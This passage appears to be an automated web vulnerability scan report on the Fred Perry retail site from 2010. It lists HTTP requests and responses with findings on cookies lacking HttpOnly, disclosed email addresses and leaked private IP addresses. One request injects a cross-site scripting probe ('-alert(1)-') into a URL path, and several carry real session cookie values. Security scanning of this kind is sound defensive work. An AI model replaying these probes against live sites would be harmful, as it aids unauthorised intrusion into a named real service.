GET /skin/frontend/default/default/css/catalogue.css HTTP/1.1 Host: www.fredperry.com Proxy-Connection: keep-alive Referer: http://fredperry.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The following cookie was issued by the application and does not have the HttpOnly flag set:
ARPT=VVNKIYS192.168.100.195CKOLQ; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /skin/frontend/default/default/css/clears.css HTTP/1.1 Host: www.fredperry.com Proxy-Connection: keep-alive Referer: http://fredperry.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
/** * Magento * * NOTICE OF LICENSE * * This source file is subject to the Academic Free License (AFL 3.0) * that is bundled with this package in the file LICENSE_AFL.txt. * It is also availabl ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
ARPT=VVNKIYS192.168.100.195CKOLQ; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /skin/frontend/default/default/css/fp_style.css HTTP/1.1 Host: www.fredperry.com Proxy-Connection: keep-alive Referer: http://fredperry.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The following cookie was issued by the application and does not have the HttpOnly flag set:
ARPT=VVNKIYS192.168.100.195CKOLQ; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /skin/frontend/default/default/css/generalpages.css HTTP/1.1 Host: www.fredperry.com Proxy-Connection: keep-alive Referer: http://fredperry.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The following cookie was issued by the application and does not have the HttpOnly flag set:
ARPT=VVNKIYS192.168.100.194CKOLO; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /skin/frontend/default/default/css/gs_960.css HTTP/1.1 Host: www.fredperry.com Proxy-Connection: keep-alive Referer: http://fredperry.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The following cookie was issued by the application and does not have the HttpOnly flag set:
ARPT=VVNKIYS192.168.100.194CKOLO; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /skin/frontend/default/default/css/gs_reset.css HTTP/1.1 Host: www.fredperry.com Proxy-Connection: keep-alive Referer: http://fredperry.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The following cookie was issued by the application and does not have the HttpOnly flag set:
ARPT=VVNKIYS192.168.100.194CKOLO; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /skin/frontend/default/default/css/gs_text.css HTTP/1.1 Host: www.fredperry.com Proxy-Connection: keep-alive Referer: http://fredperry.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The following cookie was issued by the application and does not have the HttpOnly flag set:
ARPT=VVNKIYS192.168.100.195CKOLQ; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /skin/frontend/default/default/css/payment.css HTTP/1.1 Host: www.fredperry.com Proxy-Connection: keep-alive Referer: http://fredperry.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The following cookie was issued by the application and does not have the HttpOnly flag set:
ARPT=VVNKIYS192.168.100.195CKOLQ; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /skin/frontend/default/default/css/print.css HTTP/1.1 Host: www.fredperry.com Proxy-Connection: keep-alive Referer: http://fredperry.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
/** * Magento * * NOTICE OF LICENSE * * This source file is subject to the Academic Free License (AFL 3.0) * that is bundled with this package in the file LICENSE_AFL.txt. * It is also availabl ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
ARPT=VVNKIYS192.168.100.194CKOLO; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /skin/frontend/default/default/css/styles.css HTTP/1.1 Host: www.fredperry.com Proxy-Connection: keep-alive Referer: http://fredperry.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
/** * Magento * * NOTICE OF LICENSE * * This source file is subject to the Academic Free License (AFL 3.0) * that is bundled with this package in the file LICENSE_AFL.txt. * It is also availabl ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /women/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /women/amy-winehouse-landing/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /women/amy-winehouse/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /women/dresses/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /women/jackets/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /women/knitwear/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /women/shirts/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /women/skirts/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /women/t-shirts/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /women/tennis/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /women/trousers/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /women/woven-shirts/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /customer/account/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /customer/account/login/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /customer8c3dc%22-alert(1)-%2276794ee1910/account/ HTTP/1.1 Host: www.fredperry.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.194CKOLO; __utma=119066206.1815755339.1289339096.1289339096.1289349290.2; __utmc=119066206; __utmb=119066206.4.10.1289349290
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 18:36:18 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=e1t1bajii7coiqcugmfaqqj404; expires=Tue, 09-Nov-2010 19:36:18 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Keep-Alive: timeout=3, max=500 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 29379
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sales/order/history/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.
However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
The following email addresses were disclosed in the response:
license@magentocommerce.com
sammi@oriontransfer.co.nz
tdd@tddsworld.com
Request
GET /js/index.php?c=auto&f=,prototype/prototype.js,prototype/validation.js,scriptaculous/builder.js,scriptaculous/effects.js,scriptaculous/dragdrop.js,scriptaculous/controls.js,scriptaculous/slider.js,varien/js.js,varien/form.js,varien/menu.js,mage/translate.js,mage/cookies.js,jquery/jquery-1.2.6.js,defacto/swfobject.js,defacto/jquery.jqzoom.js,defacto/jquery.cycle.all.pack.js,defacto/fp_general.js HTTP/1.1 Host: www.fredperry.com Proxy-Connection: keep-alive Referer: http://fredperry.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Set-Cookie: ARPT=VVNKIYS192.168.100.195CKOLQ; path=/ Date: Tue, 09 Nov 2010 15:45:19 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Cache-Control: must-revalidate Last-modified: Thu, 20 May 2010 11:06:23 +0000 Expires: Wed, 09 Nov 2011 15:45:19 +0000 Content-Type: text/javascript Content-Length: 399652
/* Prototype JavaScript framework, version 1.6.0.3 * (c) 2005-2008 Sam Stephenson * * Prototype is freely distributable under the terms of an MIT-style license. * For details, see the Prototype we ...[SNIP]... agdrop.js v1.8.1, Thu Jan 03 22:07:12 -0500 2008
// Copyright (c) 2005-2007 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us) // (c) 2005-2007 Sammi Williams (http://www.oriontransfer.co.nz, sammi@oriontransfer.co.nz) // // script.aculo.us is freely distributable under the terms of an MIT-style license. // For details, see the script.aculo.us web site: http://script.aculo.us/
if(Object.isUndefined(Effect)) thro ...[SNIP]... <tdd@tddsworld.com> ...[SNIP]... ide-web at this URL: * http://opensource.org/licenses/afl-3.0.php * If you did not receive a copy of the license and are unable to * obtain it through the world-wide-web, please send an email * to license@magentocommerce.com so we can send you a copy immediately. * * DISCLAIMER * * Do not edit or add to this file if you wish to upgrade Magento to newer * versions in the future. If you wish to customize Magento for yo ...[SNIP]... ide-web at this URL: * http://opensource.org/licenses/afl-3.0.php * If you did not receive a copy of the license and are unable to * obtain it through the world-wide-web, please send an email * to license@magentocommerce.com so we can send you a copy immediately. * * DISCLAIMER * * Do not edit or add to this file if you wish to upgrade Magento to newer * versions in the future. If you wish to customize Magento for yo ...[SNIP]... ide-web at this URL: * http://opensource.org/licenses/afl-3.0.php * If you did not receive a copy of the license and are unable to * obtain it through the world-wide-web, please send an email * to license@magentocommerce.com so we can send you a copy immediately. * * DISCLAIMER * * Do not edit or add to this file if you wish to upgrade Magento to newer * versions in the future. If you wish to customize Magento for yo ...[SNIP]... ide-web at this URL: * http://opensource.org/licenses/afl-3.0.php * If you did not receive a copy of the license and are unable to * obtain it through the world-wide-web, please send an email * to license@magentocommerce.com so we can send you a copy immediately. * * DISCLAIMER * * Do not edit or add to this file if you wish to upgrade Magento to newer * versions in the future. If you wish to customize Magento for yo ...[SNIP]... ide-web at this URL: * http://opensource.org/licenses/afl-3.0.php * If you did not receive a copy of the license and are unable to * obtain it through the world-wide-web, please send an email * to license@magentocommerce.com so we can send you a copy immediately. * * DISCLAIMER * * Do not edit or add to this file if you wish to upgrade Magento to newer * versions in the future. If you wish to customize Magento for yo ...[SNIP]...
/** * Magento * * NOTICE OF LICENSE * * This source file is subject to the Academic Free License (AFL 3.0) * that is bundled with this package in the file LICENSE_AFL.txt. * It is also availabl ...[SNIP]... ide-web at this URL: * http://opensource.org/licenses/afl-3.0.php * If you did not receive a copy of the license and are unable to * obtain it through the world-wide-web, please send an email * to license@magentocommerce.com so we can send you a copy immediately. * * DISCLAIMER * * Do not edit or add to this file if you wish to upgrade Magento to newer * versions in the future. If you wish to customize Magento for yo ...[SNIP]...
/** * Magento * * NOTICE OF LICENSE * * This source file is subject to the Academic Free License (AFL 3.0) * that is bundled with this package in the file LICENSE_AFL.txt. * It is also availabl ...[SNIP]... ide-web at this URL: * http://opensource.org/licenses/afl-3.0.php * If you did not receive a copy of the license and are unable to * obtain it through the world-wide-web, please send an email * to license@magentocommerce.com so we can send you a copy immediately. * * DISCLAIMER * * Do not edit or add to this file if you wish to upgrade Magento to newer * versions in the future. If you wish to customize Magento for yo ...[SNIP]...
/** * Magento * * NOTICE OF LICENSE * * This source file is subject to the Academic Free License (AFL 3.0) * that is bundled with this package in the file LICENSE_AFL.txt. * It is also availabl ...[SNIP]... ide-web at this URL: * http://opensource.org/licenses/afl-3.0.php * If you did not receive a copy of the license and are unable to * obtain it through the world-wide-web, please send an email * to license@magentocommerce.com so we can send you a copy immediately. * * DISCLAIMER * * Do not edit or add to this file if you wish to upgrade Magento to newer * versions in the future. If you wish to customize Magento for yo ...[SNIP]...
/* Prototype JavaScript framework, version 1.6.0.3 * (c) 2005-2008 Sam Stephenson * * Prototype is freely distributable under the terms of an MIT-style license. * For details, see the Prototype we ...[SNIP]... agdrop.js v1.8.1, Thu Jan 03 22:07:12 -0500 2008
// Copyright (c) 2005-2007 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us) // (c) 2005-2007 Sammi Williams (http://www.oriontransfer.co.nz, sammi@oriontransfer.co.nz) // // script.aculo.us is freely distributable under the terms of an MIT-style license. // For details, see the script.aculo.us web site: http://script.aculo.us/
if(Object.isUndefined(Effect)) thro ...[SNIP]... <tdd@tddsworld.com> ...[SNIP]... ide-web at this URL: * http://opensource.org/licenses/afl-3.0.php * If you did not receive a copy of the license and are unable to * obtain it through the world-wide-web, please send an email * to license@magentocommerce.com so we can send you a copy immediately. * * DISCLAIMER * * Do not edit or add to this file if you wish to upgrade Magento to newer * versions in the future. If you wish to customize Magento for yo ...[SNIP]... ide-web at this URL: * http://opensource.org/licenses/afl-3.0.php * If you did not receive a copy of the license and are unable to * obtain it through the world-wide-web, please send an email * to license@magentocommerce.com so we can send you a copy immediately. * * DISCLAIMER * * Do not edit or add to this file if you wish to upgrade Magento to newer * versions in the future. If you wish to customize Magento for yo ...[SNIP]... ide-web at this URL: * http://opensource.org/licenses/afl-3.0.php * If you did not receive a copy of the license and are unable to * obtain it through the world-wide-web, please send an email * to license@magentocommerce.com so we can send you a copy immediately. * * DISCLAIMER * * Do not edit or add to this file if you wish to upgrade Magento to newer * versions in the future. If you wish to customize Magento for yo ...[SNIP]... ide-web at this URL: * http://opensource.org/licenses/afl-3.0.php * If you did not receive a copy of the license and are unable to * obtain it through the world-wide-web, please send an email * to license@magentocommerce.com so we can send you a copy immediately. * * DISCLAIMER * * Do not edit or add to this file if you wish to upgrade Magento to newer * versions in the future. If you wish to customize Magento for yo ...[SNIP]... ide-web at this URL: * http://opensource.org/licenses/afl-3.0.php * If you did not receive a copy of the license and are unable to * obtain it through the world-wide-web, please send an email * to license@magentocommerce.com so we can send you a copy immediately. * * DISCLAIMER * * Do not edit or add to this file if you wish to upgrade Magento to newer * versions in the future. If you wish to customize Magento for yo ...[SNIP]...
/** * Magento * * NOTICE OF LICENSE * * This source file is subject to the Academic Free License (AFL 3.0) * that is bundled with this package in the file LICENSE_AFL.txt. * It is also availabl ...[SNIP]... ide-web at this URL: * http://opensource.org/licenses/afl-3.0.php * If you did not receive a copy of the license and are unable to * obtain it through the world-wide-web, please send an email * to license@magentocommerce.com so we can send you a copy immediately. * * DISCLAIMER * * Do not edit or add to this file if you wish to upgrade Magento to newer * versions in the future. If you wish to customize Magento for yo ...[SNIP]...
/** * Magento * * NOTICE OF LICENSE * * This source file is subject to the Academic Free License (AFL 3.0) * that is bundled with this package in the file LICENSE_AFL.txt. * It is also availabl ...[SNIP]... ide-web at this URL: * http://opensource.org/licenses/afl-3.0.php * If you did not receive a copy of the license and are unable to * obtain it through the world-wide-web, please send an email * to license@magentocommerce.com so we can send you a copy immediately. * * DISCLAIMER * * Do not edit or add to this file if you wish to upgrade Magento to newer * versions in the future. If you wish to customize Magento for yo ...[SNIP]...
/** * Magento * * NOTICE OF LICENSE * * This source file is subject to the Academic Free License (AFL 3.0) * that is bundled with this package in the file LICENSE_AFL.txt. * It is also availabl ...[SNIP]... ide-web at this URL: * http://opensource.org/licenses/afl-3.0.php * If you did not receive a copy of the license and are unable to * obtain it through the world-wide-web, please send an email * to license@magentocommerce.com so we can send you a copy immediately. * * DISCLAIMER * * Do not edit or add to this file if you wish to upgrade Magento to newer * versions in the future. If you wish to customize Magento for yo ...[SNIP]...
8. Private IP addresses disclosedpreviousnext There are 15 instances of this issue:
RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.
Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.
Issue remediation
There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.
The following RFC 1918 IP address was disclosed in the response:
192.168.100.195
Request
GET /js/index.php?c=auto&f=,prototype/prototype.js,prototype/validation.js,scriptaculous/builder.js,scriptaculous/effects.js,scriptaculous/dragdrop.js,scriptaculous/controls.js,scriptaculous/slider.js,varien/js.js,varien/form.js,varien/menu.js,mage/translate.js,mage/cookies.js,jquery/jquery-1.2.6.js,defacto/swfobject.js,defacto/jquery.jqzoom.js,defacto/jquery.cycle.all.pack.js,defacto/fp_general.js HTTP/1.1 Host: www.fredperry.com Proxy-Connection: keep-alive Referer: http://fredperry.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Set-Cookie: ARPT=VVNKIYS192.168.100.195CKOLQ; path=/ Date: Tue, 09 Nov 2010 15:45:19 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Cache-Control: must-revalidate Last-modified: Thu, 20 May 2010 11:06:23 +0000 Expires: Wed, 09 Nov 2011 15:45:19 +0000 Content-Type: text/javascript Content-Length: 399652
/* Prototype JavaScript framework, version 1.6.0.3 * (c) 2005-2008 Sam Stephenson * * Prototype is freely distributable under the terms of an MIT-style license. * For details, see the Prototype we ...[SNIP]...
